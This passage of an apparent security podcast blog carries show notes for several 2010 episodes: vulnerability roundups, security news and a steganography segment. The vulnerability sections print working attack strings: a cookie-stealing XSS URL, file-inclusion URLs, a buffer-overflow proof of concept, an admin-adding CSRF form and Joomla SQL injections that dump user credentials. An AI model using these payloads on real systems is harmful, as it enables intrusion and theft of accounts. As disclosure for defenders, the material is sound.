  2. New-CMS is subject to multiple local file-include vulnerabilities and an HTML-Injection vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view and execute a crafted ‘cmd.php’ script within the context of the webserver process. Information harvested may aid in further attacks. The attacker may leverage the HTML-Injection issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. New-CMS 1.08 is vulnerable; other versions may also be affected.  Example URL: http://www.sample.com/pdf.php?lng=cmd.php

    http://www.sample.com/newcms/struttura/manager.php?lng=cmd.php

    http://www.sample.com/newcms/struttura/editor/quote.php?lng=cmd.php

  3. OCS Inventory NG is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The issues affect versions 1.02.3, 1.3.0 and 1.3.1. Other versions may also be affected.To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.
  4. PortWise SSL VPN is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.  An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. PortWise SSL VPN 4.6 is vulnerable; other versions may also be affected.  Exploit code is available:  https://www.sample.com/wa/auth?&authmech=Assess&reloadFrame=%22;%3Cscript%3Eblah%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

News Items of Interest:

News item 1:  http://www.informationweek.com/news/government/security/showArticle.jhtml?articleID=222900539
The Department of Defense has signaled its intention to develop new policies requiring its vendors to meet increased standards for cybersecurity for unclassified military information residing on or being carried over private sector systems and networks.

In a memo issued in late January, Department of Defense chief information officer Cheryl Roby laid out a number of leadership responsibilities and strategic guidance on the development of stronger cybersecurity plans.

“It is DoD policy to establish a comprehensive approach for protecting unclassified DoD information transiting or residing on unclassified [Defense industrial base] systems and networks and create a timely, coordinated, and effective partnership with the [Defense industrial base]”

News item 2: http://www.krebsonsecurity.com/2010/02/hackers-steal-150000-from-mich-insurance-firm/

An insurance firm in Michigan lost nearly $150,000 this month as a result of a single computer virus infection.

Port Austin, Mich. based United Shortline Insurance Service Inc., an insurance provider serving the railroad industry, discovered on Feb. 5 that the computer used by their firm’s controller was behaving oddly and would not respond. The company’s computer technician scoured the system with multiple security tools, and found it had been invaded by “ZeuS,” a highly sophisticated banking Trojan that steals passwords and allows criminals to control infected hosts remotely

The following Monday, Feb. 8, United Shortline received a call from the Tinker Federal Credit Union at Tinker Air Force Base in Oklahoma, inquiring about a suspicious funds transfer one of its customers had received for slightly less than $10,000.

After that call, United Shortline President Louis M. Schillinger said the firm found 14 other such unauthorized transfers had been made from the company’s account to individuals across the United States who had no prior business with Shortline.

News item 3:http://www.computerworld.com/s/article/9157098/Hackers_at_Pwn2Own_to_compete_for_100K_in_prizes?taxonomyId=17

Pwn2Own contest next month will award cash prizes of $15,000 to anyone who can break into an iPhone, BlackBerry Bold, Droid or Nokia

smartphone.

The prizes are 50% more than the top awards given last year at Pwn2Own,which will kick off March 24 at the CanSecWest security conference in

Vancouver, British Columbia. Altogether, $100,000 could be handed out by3Com TippingPoint, the contest sponsor.

Pwn2Own will again offer a dual-track challenge with both browser and mobile OS targets, said Aaron Portnoy, a TippingPoint security research

team lead, on a company blog that announced details of this year’s contest.

Now in its fourth year, Pwn2Own has repeatedly made headlines for hacks of Apple’s Mac OS X and Microsoft’s Internet Explorer. In 2009, for

example, researcher Charlie Miller broke into a Mac in less than five seconds to win $5,000.

News item 4: http://news.techworld.com/security/3213110/billboard-porn-hacker-busted/
When a Russian hacker last month broke into a giant video advertising billboard located in Moscow to run a pornographic film on it, it caused chaos in city traffic. But Russian news sources report police in the southern city of Novorossiisk have arrested the suspected billboard hacker.

Though not identifying him by name, a statement from the Interior Ministry’s high-tech crime unit says the suspected billboard hacker is a 41-year-old unemployed man who police believe used the IP address of an organisation based in Chechnya to breach a Moscow server in order to upload his pornographic video, according to The Moscow Times.

News item 5: http://www.eweek.com/c/a/Security/Researcher-Uncovers-eBay-Security-Vulnerabilities-684970/
eBay is working to patch a cross-site request forgery vulnerability recently uncovered by a security researcher. The Avnet researcher also discovered cross-site scripting and blind SQL injection bugs in eBay’s online auction site, which eBay has fixed.

eBay is working on a fix for a cross-site request forgery problem that could allow an attacker to change a user’s password and get access to that user’s account.

News item 6: http://www.msnbc.msn.com/id/35456838/ns/technology_and_science-security/
A computer botnet is known to have breached almost 75,000 computers in 2,500 organizations around the world, including user accounts of popular social network Web sites, according Internet security firm NetWitness.The “Kneber botnet,” as it’s known, gathers login credentials to online financial systems, social networking sites and e-mail systems from infested computers and reports the information back to hackers.

News item 7: http://www.computerworld.com/s/article/9159278/Pa._school_district_denies_spying_on_students_with_MacBooks?source=rss_news

A suburban Philadelphia school district remotely activates the cameras in school-provided laptops to spy on students in their homes, a lawsuit filed in federal court Tuesday alleged.

According to the lawsuit filed by a high school student and his parents, the school has spied on students and families by “indiscriminate use of and ability to remotely activate the webcams incorporated into each laptop issued to students by the School District.”

Approximately 1,800 students at the district’s two high schools have been given laptops as part of a state- and federally-funded “one-to-one” student-to-laptop initiative.

News item 8:http://www.computerworld.com/s/article/9159258/Chinese_school_linked_to_Google_attacks_also_linked_to_01_attacks_on_White_House_site
One of two Chinese academic institutions identified in a New York Times report Thursday as the apparent source of the recent attacks against Google, has also been linked to a hacker who may have been involved with the takedown of whitehouse.gov in 2001.

The Times yesterday reported that the recent cyberattacks against Google and more than 30 other organizations appeared to have originated from computers at two schools in China. One of the schools was identified as the Shanghai Jiaotong University; the other, as the Lanxiang Vocational School, an academic institution in China’s Shandong Province with apparent ties to the country’s military.

News item 9:http://www.theregister.co.uk/2010/02/18/firefox_zero_day_report/

A Russian security researcher on Thursday said he has released attack code that exploits a critical vulnerability in the latest version of Mozilla’s Firefox browser.

The exploit – which allows attackers to remotely execute malicious code on end user PCs – triggers a heap corruption vulnerability in the popular open-source browser, said Evgeny Legerov, founder of Moscow-based Intevydis. He recently added it as a module to Vulndisco, an add-on to the Immunity Canvas automated exploitation system sold to security professionals.

News item 10:  http://www.wired.com/dangerroom/2010/02/hackers-troops-rejoice-pentagon-lifts-thumb-drive-ban/

U.S. Strategic Command has lifted its ban on the tiny drives, memory sticks, CDs and other “removable flash media” on military networks.

The repeal, first reported by InsideDefense.com, may be good news for troops, who depend on the drives to move data in bandwidth-starved locations. But it may be good news for hackers, too. The original network security concerns which prompted the ban haven’t really been addressed, one Strategic Command cyber defense specialist tells Danger Room: “Not much changed. StratCom simply does not have the support to enforce such a ban indefinitely.”

StratCom prohibited the drives’ use back in November 2008 after the Agent.btz virus began working its way through military networks. A variation of the “SillyFDC” worm, Agent.btz spreads by copying itself from thumb drive to computer and back again. Once on a PC, “it automatically downloads code from another location. And that code could be pretty much anything,” iDefense computer security expert Ryan Olson said at the time.

News item 11: http://www.eweek.com/c/a/Security/Google-Patches-Buzz-Security-Vulnerability-471810/

Google has fixed a cross-site scripting bug that allowed attackers to take control of Google Buzz accounts. The bug affects the mobile version of Buzz and was reported Feb. 16 by SecTheory CEO Robert Hansen. Google patched the vulnerability the same day. According to Hansen, news of the flaw was passed along to him by a hacker with the moniker of TrainReq.

“There [are] four things of note here,” Hansen blogged. “Firstly, it’s on Google’s domain, not some other domain like Google Gadgets or something. So, yes, it’s bad for phishing and for cookies. Secondly, it’s over SSL/TLS [Secure Sockets Layer/Transport Layer Security] (so no one should be able to see what’s going on, right?). Third, it could be used to hijack Google Buzz—as if anyone is using that product (or at least you shouldn’t be). And lastly, isn’t it ironic that Google is asking to know where I am on the very same page that’s being compromised?”

News item 12: http://www.scientificamerican.com/article.cfm?id=flattery-will-get-you-far&sc=MND_20100216
Elaine Chan and Jaideep Sengupta at the Hong Kong University of Science and Technology research which was first reported in the Journal of Marketing Research, showed that while most people can spot obvious flattery and attempts to influence them, on an innate subconscious level it actually works!

The study showed that while participants explicit attitudes rejected marketing come-on’s, their implicit attitudes were more positive and could be used to predict future behavior. This susceptibility to flattery may stem from the basic human need to feel good about oneself, referred to as illusory superiority or the above-average effect.

In testing whether or not the motive to self-enhance was related to insincere flattery, the researchers showed that, in the words of Scientific American, “those of us who could use a little pick-me up to begin with are particularly vulnerable to the message behind a smooth sales pitch”.

So, how does this relate to information security and why is it important? This all goes back to social engineering and the ability to market towards or convince other people to do what you want them to. Knowledge of these behavioral responses can be applied to social engineering as part of penetration testing and taught as part of security awareness training. On the converse, look for this to be used in phishing attempts.

2010
02.18

Episode 70 – “Stego A Go Go”

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

 
ISD Podcast Episode 70 for February 18, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com will be putting on their SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191

Data Recovery Class April 12th to the 16th in Washington DC goto MyHardDriveDied.com or email smoulton at nicservices dot com for more information.

The next dc404 meeting is THIS Saturday, February 20th, at 2pm at the Vortex Midtown.   This month’s topic is “Social Engineering,” and Beau W. will be presenting. We hope to see a big group on Saturday!

March 15 – 20, 2010 SANS Audit 507: Auditing Networks, Perimeter and Systems  (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)

April 15 – 21, 2010  SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression (TM) (http://www.sans.org/atlanta-security-leadership-2010-cs)

May 17 – 21, 2010  SANS Security 566:  Implementing and Auditing the Twenty Critical Security Controls – In Depth  (http://www.sans.org/atlanta-critical-controls-2010-cs)

Vulnerabilities of Interest:

  1. Mozilla Firefox and SeaMonkey are subject to a cross-domain scripting vulnerability because they fail to properly sanitize user-supplied input.
    An attacker can exploit this issue to execute arbitrary code in the context of a different domain. Successful exploits may result in privilege escalation. Versions prior to the following are vulnerable: Firefox 3.6, Firefox 3.5.8, Firefox 3.0.18 and SeaMonkey 2.0.3. Other versions may also be affected. All that an attacker has to do to exploit this vulnerability is lure an unsuspecting victim to a malicious URL.
  2. Mozilla Firefox and SeaMonkey are subject to a cross-domain scripting vulnerability because they fail to properly handle SVG documents referenced via the ‘embed’ tag.  Attackers may leverage this issue to execute arbitrary script code within the context of targeted sites; this may allow the attacker to steal cookie-based authentication credentials or to launch other attacks. All that an attacker has to do to exploit this vulnerability is lure an unsuspecting victim to a malicious URL.
  3. The iTweak Upload module for Drupal is subject to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
    Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
    To exploit this issue, the attacker must have permissions to create content and upload files. The following are vulnerable: iTweak Upload 6.x-1.x (prior to 6.x-1.2) and iTweak Upload 6.x-2.x (prior to 6.x-2.3).  All that an attacker has to do to exploit this vulnerability is lure an unsuspecting victim to a malicious URL.
  4. Rising Online Virus Scanner ActiveX control is subject to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Successful exploits may allow an attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions.  Rising Online Virus Scanner 22.0.5 is vulnerable; other versions may also be affected. Proof of concept code is available:
    &lt;html&gt;
    &lt;body&gt;
    &lt;object classid=&#039;clsid:9FAFB576-6933-4CCC-AB3D-B988EC43D04E&#039;
    id=&#039;obj&#039;&gt;&lt;/object&gt;
    &lt;script language=&#039;vbscript&#039;&gt;
    buf=String(520000, &quot;A&quot;)
    obj.Scan buf
    &lt;/script&gt;
    &lt;/body&gt;
    &lt;/html&gt;
  5. The KDE screensaver application is subject to a vulnerability that allows an attacker who has physical console access to bypass the user’s locked screen. This issue affects the KRunner application used to perform password validation. Computers may be affected by this issue even when no screensaver is being used. KDE 4.4.0 is vulnerable; other versions may also be affected. To exploit this issue, attackers require physical console access.
  6. Cisco ASA 5500 series appliances are subject to a remote authentication-bypass vulnerability. Successful exploits allow remote attackers to gain access to vulnerable devices, without requiring successful authentication. This issue is being tracked by Cisco bug ID CSCte21953. Attackers can use readily available tools to exploit this issue.
  7. The Sun-Java package of Pardus is subject to a local privilege-escalation vulnerability. Local attackers can exploit this issue to execute arbitrary code with escalated privileges and may completely compromise the affected computer. An attacker can use readily available command-line utilities to exploit this issue.

News Items of Interest:

News item 1:  http://news.cnet.com/8301-13860_3-10454741-56.html?part=rss&subj=news&tag=2547-1_3-0-20

Microsoft is looking into reports that some Windows Live customers may have gotten access to other users’ information.

“Microsoft is investigating reports of a limited number of instances in which Windows Live customers may have access to other customers’ accounts when accessing their account through mobile Web browser,” the company said in a statement Tuesday. “Microsoft takes customers’ privacy seriously, and immediately upon learning of these reports, we started an investigation.”

The company added that it “will take appropriate action once we have completed the investigation.”

News item 2: http://zero.facebook.com/

Facebook has revealed details of a stripped-down, text-only version of its mobile site called Facebook Zero. The low-bandwidth site is aimed at people viewing Facebook on their mobile and will launch “in the coming weeks”.  The social network recently said that more than 100 million people now access Facebook from their phone.  Is Kevin Johnson behind this?

News item 3: http://www.myinfosecjob.com/2010/01/7-things-every-security-professional-should-know/
The following is an extract from an article I came across. It attempts to address some aspects that go beyond skill sets.. in fact I might dare call them soft skills..

To be considered a respected Information Security Professional nowadays requires more than just knowing the bits or bytes, or the controls required by a given framework by heart. Being successful in your Information Security career requires you to have a deep understanding of the business needs (and how to enable, not disrupt them), sharp communication skills and a swift ability to sell yourself.

1. Learn to communicate effectively (This can not be underestimated.  We struggle in our personal, business and yes, even on this podcast)
2. Learn to say ‘may be’ rather than ‘no’ (This is something I personally work at, I’d rather not be perceived as a roadblock, but yet an enabler)
3. Social networking sites are not just extensions of instant messengers (I’m trying to embrace them, but people like Kevin Johnson scare the hell out of me!)
4. Monitor security industry budgets and salary trends (It’s nice to know what your skills are worth and what your industry is devoting to both IT and Security Budgets)
5. Don’t be limited to just reading (So those that are listening to this are already meeting this!)
6. Blogging is serious business (As is podcasting, that’s not to say you can’t have fun, but you need to recognize it’s value)
7. Don’t be afraid of starting a business (or join a smaller company where you can make a difference)

News item 4:  http://www.informationweek.com/news/government/security/showArticle.jhtml?articleID=222900539
The Department of Defense has signaled its intention to develop new policies requiring its vendors to meet increased standards for cybersecurity for unclassified military information residing on or being carried over private sector systems and networks.

In a memo issued in late January, Department of Defense chief information officer Cheryl Roby laid out a number of leadership responsibilities and strategic guidance on the development of stronger cybersecurity plans.

“It is DoD policy to establish a comprehensive approach for protecting unclassified DoD information transiting or residing on unclassified [Defense industrial base] systems and networks and create a timely, coordinated, and effective partnership with the [Defense industrial base],” Roby wrote.

News item 5: http://www.krebsonsecurity.com/2010/02/hackers-steal-150000-from-mich-insurance-firm/

An insurance firm in Michigan lost nearly $150,000 this month as a result of a single computer virus infection.

Port Austin, Mich. based United Shortline Insurance Service Inc., an insurance provider serving the railroad industry, discovered on Feb. 5 that the computer used by their firm’s controller was behaving oddly and would not respond. The company’s computer technician scoured the system with multiple security tools, and found it had been invaded by “ZeuS,” a highly sophisticated banking Trojan that steals passwords and allows criminals to control infected hosts remotely

The following Monday, Feb. 8, United Shortline received a call from the Tinker Federal Credit Union at Tinker Air Force Base in Oklahoma, inquiring about a suspicious funds transfer one of its customers had received for slightly less than $10,000.

After that call, United Shortline President Louis M. Schillinger said the firm found 14 other such unauthorized transfers had been made from the company’s account to individuals across the United States who had no prior business with Shortline.

News item 6: http://www.computerworld.com/s/article/9157098/Hackers_at_Pwn2Own_to_compete_for_100K_in_prizes?taxonomyId=17

Pwn2Own contest next month will award cash prizes of $15,000 to anyone who can break into an iPhone, BlackBerry Bold, Droid or Nokia

smartphone.

The prizes are 50% more than the top awards given last year at Pwn2Own,which will kick off March 24 at the CanSecWest security conference in

Vancouver, British Columbia. Altogether, $100,000 could be handed out by3Com TippingPoint, the contest sponsor.

Pwn2Own will again offer a dual-track challenge with both browser and mobile OS targets, said Aaron Portnoy, a TippingPoint security research

team lead, on a company blog that announced details of this year’s contest.

Now in its fourth year, Pwn2Own has repeatedly made headlines for hacks of Apple’s Mac OS X and Microsoft’s Internet Explorer. In 2009, for

example, researcher Charlie Miller broke into a Mac in less than five seconds to win $5,000.

Technical Segment: Stego fun.

Steganography articles
http://www.jjtc.com/pub/r2026.pdf
http://www.citi.umich.edu/u/provos/papers/practical.pdf
http://nas.takming.edu.tw/chkao/LNCS2001.pdf

James Shewmakers Defcon 16 talk
http://bit.ly/aaeyYS
Original Image

The encoded.png just has “Hello Rick!!!” embedded in it using LSB on each of the RGB values per pixel.  I want to see if I can write a simple bot that uses Steganography and blinddrops as a C&C.  Oh, and this is a much better tool:
http://steghide.sourceforge.net/

ZipIt stuff:

Buy it
http://www.amazon.com/ZIPIT-All-Wi-Fi-Messenger-Black/dp/B00115PR2O/ref=sr_1_1?ie=UTF8&s=electronics&qid=1266522988&sr=8-1

Hak5
http://hak5.org

Hunter Davis’ Blog
http://hunterdavis.com/archives/category/zipit-hacking

More Noob friendly userland image:
http://zipit.rootnexus.org/

2010
02.17

Episode 69 – “Very Nice”

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

 
ISD Podcast Episode 69 for February 17, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com will be putting on their SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191

Data Recovery Class April 12th to the 16th in Washington DC goto MyHardDriveDied.com or email smoulton at nicservices dot com for more information.
Shmoocon Fireside Talks: http://www.irongeek.com/i.php?page=videos/shmoocon-firetalks-2010

March 15 – 20, 2010 SANS Audit 507: Auditing Networks, Perimeter and Systems  (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)

April 15 – 21, 2010  SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression (TM) (http://www.sans.org/atlanta-security-leadership-2010-cs)

May 17 – 21, 2010  SANS Security 566:  Implementing and Auditing the Twenty Critical Security Controls – In Depth  (http://www.sans.org/atlanta-critical-controls-2010-cs)

Vulnerabilities of Interest:

  1. Huawei HG510 is subject to multiple cross-site request-forgery vulnerabilities. Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible. Example URL is available: http://www.sample.com/password.cgi?sysPassword=BASE64_NEW_PASSWORD
  2. Généré par KDPics v1.18 is subject to a vulnerability that could allow an attacker to remote add an Admin account.  Google Dork: “Généré par KDPics v1.18″Exploit code is available:
    <html>
    <title>Généré par KDPics v1.18 Remote Add Admin</title>

    <body link=”#00FF00″ text=”#008000″
    bgcolor=”#000000″>

    <form method=”POST”
    action=”http://www.site.com/kdpics/admin/index.php3?page=options&c
    ategorie=”>
    <input
    value=”add”>
    <table border=”1″ cellpadding=”4″
    style=”border-collapse: collapse” width=”100%”
    bordercolor=”#808080″>
    <tr>
    <td>
    <p align=”center”><b>User & Pass
    :Snakespc</b></p>
    <p align=”center”><b><font face=”Comic Sans
    MS”>
    <a href=”http://server/path//index.php?act=idx”
    style=”text-decoration: none”>
    <font color=”#00FF00″>[&#187;]Founder:[ Snakespc
    Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]</p>
    [&#187;] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My
    Mamber >> sec-war.com/cc ]</p>[&#187;] Dork:”Généré
    par KDPics
    v1.18″</font></a></font></b></p>
    <p align=”center”><b>Username:</b></td>
    </tr>
    <tr>
    <td height=”1″>
    <p align=”center”><input
    size=”30″
    value=”Snakespc”></td>
    </tr>
    <tr>
    <td>
    <p align=”center”><b>Password:</b></td>
    </tr>
    <tr>

    <td height=”22″>
    <p align=”center”>
    <input
    size=”30″ value=”Snakespc”></td>
    </tr>
    <tr>
    <td align=”right”>
    <p align=”center”>
    <input value=”Add User >>”
    style=”font-weight: 700″></td>
    </tr>
    </form>
    </table>
    </html>
    [&#187;]Author: Snakespc <-

  3. SyntaxCMS version 1.3 is subject to a remote file inclusion vulnerability.  PoC code is available: [SyntaxCMS_path]/admin/testing/tests/0004_init_urls.php?init_path=[Shell]
  4. PEAR version 1.9.0 is subject to multiple Remote File Inclusion vulnerabilities.  Exploit code is available: http://www.sample.com/[DIRECTORY_SEPARATOR]/PEAR_DIR/PEAR.php?include_path=[Shell.txt?]
  5. The ‘com_acteammember’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/index.php?option=com_acteammember&amp;id=-1+UNION+SELECT+1,2,3,4,5,concat(username,0×20,password),7,8,9,10,11,12,13,14,15+from+mos_users–&amp;Itemid=121&amp;lang=en
  6. The ‘com_acstartseite’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Example URL: http://www.sample.com/index.php?option=com_acstartseite&amp;Itemid=null+and+1=2+union+select+1,2,concat(username,0×20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users&amp;lang=de

News Items of Interest:

News item 1: http://www.gizmodo.com.au/2010/02/is-apple-banning-iphone-hackers/

Sherif Hashim and iH8sn0w are both reporting bannings by Apple ID, following their latest hacks.  Is Apple attacking jailbreak from the bottom up? Maybe. Both Sherif Hashim and iH8sn0w were behind the discovery of recent iPhone exploits, and both are currently receiving a “This Apple ID has been banned for security purposes” notification whenever they try to log into the (actual) App Store to download an app. But. But! While Sherif’s exploit was publicly documented, IH8sn0w’s was shared only with the Dev Team. So: Is Apple somehow detecting certain exploits and banning automatically?
News item 2: http://reviews.cnet.com/8301-13970_7-10453550-78.html?part=rss&subj=news&tag=2547-1_3-0-20

Dick Lynch, an executive vice president and CTO for Verizon Communications, said during a press conference here that Verizon Wireless is on track to launch its commercial LTE (long-term evolution) service this year. The gathering was hosted by the GSM Association, which puts on the Mobile World Congress.

Lynch said Verizon Wireless is in the final testing phase, or “Phase 4,” of its LTE technology. Within 60 days he said he expects testing to be completed in Boston and Seattle. After those trials are complete, Verizon will be ready to announce commercial deployments
News item 3: http://www.computerworld.com/s/article/9157558/Update_Adobe_issues_emergency_PDF_patches?taxonomyId=18
As expected, Adobe today released an emergency update that patched a pair of critical vulnerabilities in its popular PDF viewing and editing software.

Adobe ranked both bugs as critical.

Last Thursday Adobe said it would issue a rush patch for Adobe Reader and Adobe Acrobat on Feb. 16; it made good on the promise yesterday by addressing two flaws. One was identical to the cross-domain request vulnerability fixed last week in Flash Player, Adobe’s ubiquitous media player, while the second was a vulnerability that attackers could exploit to install malware on a targeted machine.

The bug related to Flash Player, tagged as CVE-2010-0186 in the Common Vulnerabilities and Exposures (CVE) database, cannot be used to inject malicious code into a system, but could be exploited by information thieves in a cross-site scripting style of attack.

News item 4: http://chatroulette.com/

Make sure there are no kids in the room if you plan on trying out the Chatroulette video chat service. While I was able to have a couple of very nice conversations with fully clothed polite individuals, I saw some things I would rather have avoided as I tested this relatively new service.

When you first enter the site you’ll see two large black boxes and a blank area for text chat. As soon as you click “play,” you’ll see a stranger’s picture in the top box and–at least on my machine–a notice asking if you wish to allow the site to access your video camera. If you click “allow,” you’ll see your picture in the bottom box.
News item 5: http://cwe.mitre.org/top25/

Computer experts from some 30 organizations worldwide have once again compiled a list of the 25 most dangerous programming errors along with a novel way to prevent them: by drafting contracts that hold developers responsible when bugs creep into applications.

The list for 2010 bears a striking resemblance to last year’s list, which was the first time a broad cross section of the world’s computer scientists reached formal agreement on the most common programming pitfalls. The effort is designed to shift attention to the underlying mistakes that allow vulnerabilities to happen in the first place.
Rank     Score ID     Name
[1]         346         CWE-79 Failure to Preserve Web Page Structure (‘Cross-site Scripting’)
[2]         330         CWE-89 Improper Sanitization of Special Elements used in an SQL Command (‘SQL Injection’)
[3]         273         CWE-120 Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)
[4]         261         CWE-352 Cross-Site Request Forgery (CSRF)
[5]         219         CWE-285 Improper Access Control (Authorization)
[6]         202         CWE-807 Reliance on Untrusted Inputs in a Security Decision
[7]         197         CWE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
[8]         194         CWE-434 Unrestricted Upload of File with Dangerous Type
[9]         188         CWE-78 Improper Sanitization of Special Elements used in an OS Command (‘OS Command Injection’)
[10]       188         CWE-11 Missing Encryption of Sensitive Data
[11]       176         CWE-798 Use of Hard-coded Credentials
[12]       158         CWE-805 Buffer Access with Incorrect Length Value
[13]       157         CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP File Inclusion’)
[14]       156         CWE-129 Improper Validation of Array Index
[15]       155         CWE-754 Improper Check for Unusual or Exceptional Conditions
[16]       154         CWE-209 Information Exposure Through an Error Message
[17]       154         CWE-190 Integer Overflow or Wraparound
[18]       153         CWE-131 Incorrect Calculation of Buffer Size
[19]       147         CWE-306 Missing Authentication for Critical Function
[20]       146         CWE-494 Download of Code Without Integrity Check
[21]       145         CWE-732 Incorrect Permission Assignment for Critical Resource
[22]       145         CWE-770 Allocation of Resources Without Limits or Throttling
[23]       142         CWE-601 URL Redirection to Untrusted Site (‘Open Redirect’)
[24]       141         CWE-327 Use of a Broken or Risky Cryptographic Algorithm
[25]       138         CWE- 362 Race Condition

News item 6: http://www.washingtonpost.com/wp-dyn/content/article/2010/02/14/AR2010021403817.html?hpid=sec-tech

More private computers were commandeered by hackers for malicious purposes in China in the last quarter of 2009 than in any other country, according to a new study by an Internet security company.

These “zombie” computers are often grouped into “botnets,” or armies of infected computers that can be used to send spam e-mail or attack websites, according to McAfee. The company, which said it collects information about Internet-based threats that target more than 100 million computers in 120 countries, said that in the last three months of 2009, about 1,095,000 computers in China were infected and 1,057,000 in the United States.

News item 7: http://ha.ckers.org/blog/20100216/google-buzz-security-flaw/
Apparently, the Google Buzz for Mobile Web site is subject to a cross-site scripting flaw which could allow an attacker to have your Buzz say things you don’t want to say or follow people you don’t want to follow.  This is yet another example of bad input validation/output encoding by your favorite advertising overlords at Google.

There’s four things of note here. Firstly it’s on Google’s domain, not some other domain like Google Gadgets or something. So yes, it’s bad for phishing and for cookies. Secondly, it’s over SSL/TLS and thirdly, it could be used to hijack Google Buzz.

So I setout to remove myself from Buzz and it’s not quite as difficult as it once was. One way to do this is to find your profile (http://www.google.com/profiles) and search on your name. Next, permanently delete buzzes in the public timeline by clicking the “Delete” tag. Then get to work unfollowing those that Google has “helped” you automatically follow.  Once you’ve done that you can go into your profile and choose delete.  This will remove your public profile which is probably redundant as it also removes your buzzes and followers, etc.  Now you can go to the bottom of gmail and click “Turn Off Buzz”.  That should do it.

2010
02.16

Episode 68 – Splitting Spandex

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

 
ISD Podcast Episode 68 for February 16, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com will be putting on their SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191

Data Recovery Class April 12th to the 16th in Washington DC goto MyHardDriveDied.com or email smoulton at nicservices dot com for more information.
Shmoocon Fireside Talks: http://www.irongeek.com/i.php?page=videos/shmoocon-firetalks-2010

Vulnerabilities of Interest:

  1. The Linux kernel is subject to a local denial-of-service vulnerability.Attackers can exploit this issue to cause the affected kernel to crash, denying service to legitimate users. Versions prior to Linux kernel 2.6.33-rc6 are vulnerable.  NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled. Exploit code is available.
  2. StatCounteX is subject to a vulnerability that results in unauthorized administrative access. The application fails to authenticate users when certain pages are accessed. Attackers can leverage this issue to compromise the application, which could aid in other attacks. StatCounteX 3.0 and 3.1 are vulnerable; other versions may also be affected. Attackers can use a browser to exploit this issue.
  3. The ‘com_flashmagazinedeluxe’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/index.php?option=com_flashmagazinedeluxe&amp;Itemid=36&amp;task=magazine&amp;mag_id=4+AND SUBSTRING(@@version,1,1)=4
  4. The ‘com_hdvideoshare’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/index.php?option=com_hdvideoshare&amp;view=player&amp;id=-45+UNION SELECT concat(username,0x3a,password,0x3a,email),2,3,4+from+jos_users
  5. The ‘com_videos’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL:  http://www.sample.com/index.php?option=com_videos&amp;act=view&amp;Itemid=27&amp;id=-1084+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users
  6. httpdx is subject to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploiting this issue allows an authenticated user to create directories outside the FTP root directory, which may lead to other attacks. httpdx 1.5 is vulnerable; other versions may also be affected. Exploit Code is available:
    # Exploit Title: httpdx – ultralight http/ftp server directory Traversal
    # Date: 14/2/2010
